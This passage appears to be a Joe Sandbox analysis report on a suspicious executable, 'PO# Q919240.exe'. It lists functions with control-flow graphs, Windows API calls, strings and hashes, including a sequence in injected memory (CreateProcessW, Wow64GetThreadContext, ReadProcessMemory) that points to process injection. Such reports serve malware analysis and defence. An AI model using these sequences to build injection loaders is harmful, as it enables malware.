                • Opcode ID: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                • Opcode Fuzzy Hash: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B
                Function 0040F5C0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 125COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1054 40f5c0-40f5cf call 422240 1057 40f5d0-40f5e8 1054->1057 1057->1057 1058 40f5ea-40f613 call 413650 call 410e60 1057->1058 1063 40f614-40f633 call 414d04 1058->1063 1066 40f691 1063->1066 1067 40f635-40f63c 1063->1067 1068 40f696-40f69c 1066->1068 1069 40f660-40f674 call 4150d1 1067->1069 1070 40f63e 1067->1070 1074 40f679-40f67c 1069->1074 1072 40f640 1070->1072 1073 40f642-40f650 1072->1073 1075 40f652-40f655 1073->1075 1076 40f67e-40f68c 1073->1076 1074->1063 1077 40f65b-40f65e 1075->1077 1078 425d1e-425d3e call 4150d1 call 414d04 1075->1078 1079 40f68e-40f68f 1076->1079 1080 40f69f-40f6ad 1076->1080 1077->1069 1077->1072 1091 425d43-425d5f call 414d30 1078->1091 1079->1075 1082 40f6b4-40f6c2 1080->1082 1083 40f6af-40f6b2 1080->1083 1085 425d16 1082->1085 1086 40f6c8-40f6d6 1082->1086 1083->1075 1085->1078 1088 425d05-425d0b 1086->1088 1089 40f6dc-40f6df 1086->1089 1088->1073 1090 425d11 1088->1090 1089->1075 1090->1085 1091->1068
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: __fread_nolock_fseek_memmove_strcat
                • String ID: AU3!$EA06
                • API String ID: 1268643489-2658333250
                • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754
                Function 00401100 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136windowtimeregistryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1094 401100-401111 1095 401113-401119 1094->1095 1096 401179-401180 1094->1096 1098 401144-40114a 1095->1098 1099 40111b-40111e 1095->1099 1096->1095 1097 401182 1096->1097 1103 40112c-401141 DefWindowProcW 1097->1103 1101 401184-40118e call 401250 1098->1101 1102 40114c-40114f 1098->1102 1099->1098 1100 401120-401126 1099->1100 1100->1103 1104 42b038-42b03f 1100->1104 1111 401193-40119a 1101->1111 1105 401151-401157 1102->1105 1106 40119d 1102->1106 1104->1103 1110 42b045-42b059 call 401000 call 40e0c0 1104->1110 1108 401219-40121f 1105->1108 1109 40115d 1105->1109 1112 4011a3-4011a9 1106->1112 1113 42afb4-42afc5 call 40f190 1106->1113 1108->1100 1117 401225-42b06d call 468b0e 1108->1117 1115 401163-401166 1109->1115 1116 42b01d-42b024 1109->1116 1110->1103 1112->1100 1114 4011af 1112->1114 1113->1111 1114->1100 1120 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 1114->1120 1121 4011db-401202 SetTimer RegisterWindowMessageW 1114->1121 1123 42afe9-42b018 call 40f190 call 401a50 1115->1123 1124 40116c-401172 1115->1124 1116->1103 1122 42b02a-42b033 call 4370f4 1116->1122 1117->1111 1121->1111 1130 401204-401216 CreatePopupMenu 1121->1130 1122->1103 1123->1103 1124->1100 1132 401174-42afde call 45fd57 1124->1132 1132->1103 1145 42afe4 1132->1145 1145->1111
                APIs
                • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                • KillTimer.USER32(?,00000001,?), ref: 004011B9
                • PostQuitMessage.USER32(00000000), ref: 004011CB
                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                • CreatePopupMenu.USER32 ref: 00401204
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                • String ID: TaskbarCreated
                • API String ID: 129472671-2362178303
                • Opcode ID: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                • Opcode Fuzzy Hash: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E
                Function 004115D7 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1146 4115d7-4115df 1147 4115ee-4115f9 call 4135bb 1146->1147 1150 4115e1-4115ec call 411988 1147->1150 1151 4115fb-4115fc 1147->1151 1150->1147 1154 4115fd-41160e 1150->1154 1155 411610-41163b call 417fc0 call 41130a 1154->1155 1156 41163c-411656 call 4180af call 418105 1154->1156 1155->1156
                APIs
                • _malloc.LIBCMT ref: 004115F1
                  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                • std::exception::exception.LIBCMT ref: 00411626
                • std::exception::exception.LIBCMT ref: 00411640
                • __CxxThrowException@8.LIBCMT ref: 00411651
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                • String ID: ,*H$4*H$@fI
                • API String ID: 615853336-1459471987
                • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D
                Function 04264650 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1165 4264650-42646fe call 4262060 1168 4264705-426472b call 4265560 CreateFileW 1165->1168 1171 4264732-4264742 1168->1171 1172 426472d 1168->1172 1179 4264744 1171->1179 1180 4264749-4264763 VirtualAlloc 1171->1180 1173 426487d-4264881 1172->1173 1174 42648c3-42648c6 1173->1174 1175 4264883-4264887 1173->1175 1181 42648c9-42648d0 1174->1181 1177 4264893-4264897 1175->1177 1178 4264889-426488c 1175->1178 1182 42648a7-42648ab 1177->1182 1183 4264899-42648a3 1177->1183 1178->1177 1179->1173 1184 4264765 1180->1184 1185 426476a-4264781 ReadFile 1180->1185 1186 4264925-426493a 1181->1186 1187 42648d2-42648dd 1181->1187 1190 42648ad-42648b7 1182->1190 1191 42648bb 1182->1191 1183->1182 1184->1173 1192 4264783 1185->1192 1193 4264788-42647c8 VirtualAlloc 1185->1193 1188 426493c-4264947 VirtualFree 1186->1188 1189 426494a-4264952 1186->1189 1194 42648e1-42648ed 1187->1194 1195 42648df 1187->1195 1188->1189 1190->1191 1191->1174 1192->1173 1198 42647cf-42647ea call 42657b0 1193->1198 1199 42647ca 1193->1199 1196 4264901-426490d 1194->1196 1197 42648ef-42648ff 1194->1197 1195->1186 1201 426490f-4264918 1196->1201 1202 426491a-4264920 1196->1202 1200 4264923 1197->1200 1205 42647f5-42647ff 1198->1205 1199->1173 1200->1181 1201->1200 1202->1200 1206 4264832-4264846 call 42655c0 1205->1206 1207 4264801-4264830 call 42657b0 1205->1207 1213 426484a-426484e 1206->1213 1214 4264848 1206->1214 1207->1205 1215 4264850-4264854 CloseHandle 1213->1215 1216 426485a-426485e 1213->1216 1214->1173 1215->1216 1217 4264860-426486b VirtualFree 1216->1217 1218 426486e-4264877 1216->1218 1217->1218 1218->1168 1218->1173
                APIs
                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 04264721
                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 04264947
                Memory Dump Source
                • Source File: 00000000.00000002.1467809739.0000000004262000.00000040.00000020.00020000.00000000.sdmp, Offset: 04262000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4262000_PO# Q919240.jbxd
                Similarity
                • API ID: CreateFileFreeVirtual
                • String ID:
                • API String ID: 204039940-0
                • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                • Instruction ID: fe9a0efe5b5faf39e1f386f2fba5aaef37a6522b4096352a58ea17f4ff85176f
                • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                • Instruction Fuzzy Hash: 24A12B74E10209EBDB14DFA4C994BEEB7B5FF48305F208159E546BB280D775AA80CF58
                Function 004102B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1219 4102b0-4102c5 SHGetMalloc 1220 4102cb-4102da SHGetDesktopFolder 1219->1220 1221 425dfd-425e0e call 433244 1219->1221 1222 4102e0-41031a call 412fba 1220->1222 1223 41036b-410379 1220->1223 1231 410360-410368 1222->1231 1232 41031c-410331 SHGetPathFromIDListW 1222->1232 1223->1221 1229 41037f-410384 1223->1229 1231->1223 1233 410351-41035d 1232->1233 1234 410333-41034a call 412fba 1232->1234 1233->1231 1234->1233
                APIs
                • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                • _wcsncpy.LIBCMT ref: 004102ED
                • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                • _wcsncpy.LIBCMT ref: 00410340
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                • String ID: C:\Users\user\Desktop\PO# Q919240.exe
                • API String ID: 3170942423-1484967488
                • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                Function 0040E4C0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79registryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1237 40e4c0-40e4e5 call 403350 RegOpenKeyExW 1240 427190-4271ae RegQueryValueExW 1237->1240 1241 40e4eb-40e4f0 1237->1241 1242 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 1240->1242 1243 42721a-42722a RegCloseKey 1240->1243 1248 427210-427219 call 436508 1242->1248 1249 4271f7-42720e call 402160 1242->1249 1248->1243 1249->1248
                APIs
                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: QueryValue$CloseOpen
                • String ID: Include$Software\AutoIt v3\AutoIt
                • API String ID: 1586453840-614718249
                • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                Function 00410570 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1254 410570-4105f1 CreateWindowExW * 2 ShowWindow * 2
                APIs
                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                • ShowWindow.USER32(?,00000000), ref: 004105E4
                • ShowWindow.USER32(?,00000000), ref: 004105EE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Window$CreateShow
                • String ID: AutoIt v3$edit
                • API String ID: 1584632944-3779509399
                • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                Function 04264410 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 148fileCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 04264300: Sleep.KERNELBASE(000001F4), ref: 04264311
                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0426453E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1467809739.0000000004262000.00000040.00000020.00020000.00000000.sdmp, Offset: 04262000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4262000_PO# Q919240.jbxd
                Similarity
                • API ID: CreateFileSleep
                • String ID: 8JO09KWU1X1ZHK5WP8MJBAXULW
                • API String ID: 2694422964-2282072137
                • Opcode ID: 4d04371689ea0721e7abc73f719e28f6ea2bcaa91187400a9ddb383549c0da5b
                • Instruction ID: e12444c3f64bff35331e4fbb6fec0c844a786ec38580a095543537c0dbe39ad3
                • Opcode Fuzzy Hash: 4d04371689ea0721e7abc73f719e28f6ea2bcaa91187400a9ddb383549c0da5b
                • Instruction Fuzzy Hash: 9E51B631E14288DAEF11DBF4C814BDEBB799F15304F004189E6497B2C1CBB91B89CBA6
                Function 0040F250 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66registryCOMMON
                Download Yara Rule
                APIs
                • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Close$OpenQueryValue
                • String ID: Control Panel\Mouse
                • API String ID: 1607946009-824357125
                • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                Function 04263300 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                Download Yara Rule
                APIs
                • CreateProcessW.KERNELBASE(?,00000000), ref: 04263ABB
                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04263B51
                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04263B73
                Memory Dump Source
                • Source File: 00000000.00000002.1467809739.0000000004262000.00000040.00000020.00020000.00000000.sdmp, Offset: 04262000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4262000_PO# Q919240.jbxd
                Similarity
                • API ID: Process$ContextCreateMemoryReadThreadWow64
                • String ID:
                • API String ID: 2438371351-0
                • Opcode ID: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                • Instruction ID: 87238e885dedfad9e7fb03a5bd6adcac9d5f1eb8b8de55c2d80b87fae6b8611b
                • Opcode Fuzzy Hash: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                • Instruction Fuzzy Hash: EA620B30A24258DBEB24DFA4C850BDEB376EF58300F1091A9D50DEB394E775AE81CB59
                Function 0040F570 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 247COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                • _free.LIBCMT ref: 004295A0
                  • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                  • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                  • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                  • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                  • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                  • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\Desktop\PO# Q919240.exe
                • API String ID: 3938964917-31329374
                • Opcode ID: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                • Opcode Fuzzy Hash: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                Function 0040BD80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _memmove
                • String ID: Error:
                • API String ID: 4104443479-232661952
                • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                Function 0040F520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON
                Download Yara Rule
                APIs
                • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\PO# Q919240.exe,0040F545,C:\Users\user\Desktop\PO# Q919240.exe,004A90E8,C:\Users\user\Desktop\PO# Q919240.exe,?,0040F545), ref: 0041013C
                  • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                  • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                  • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                  • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                  • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                  • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
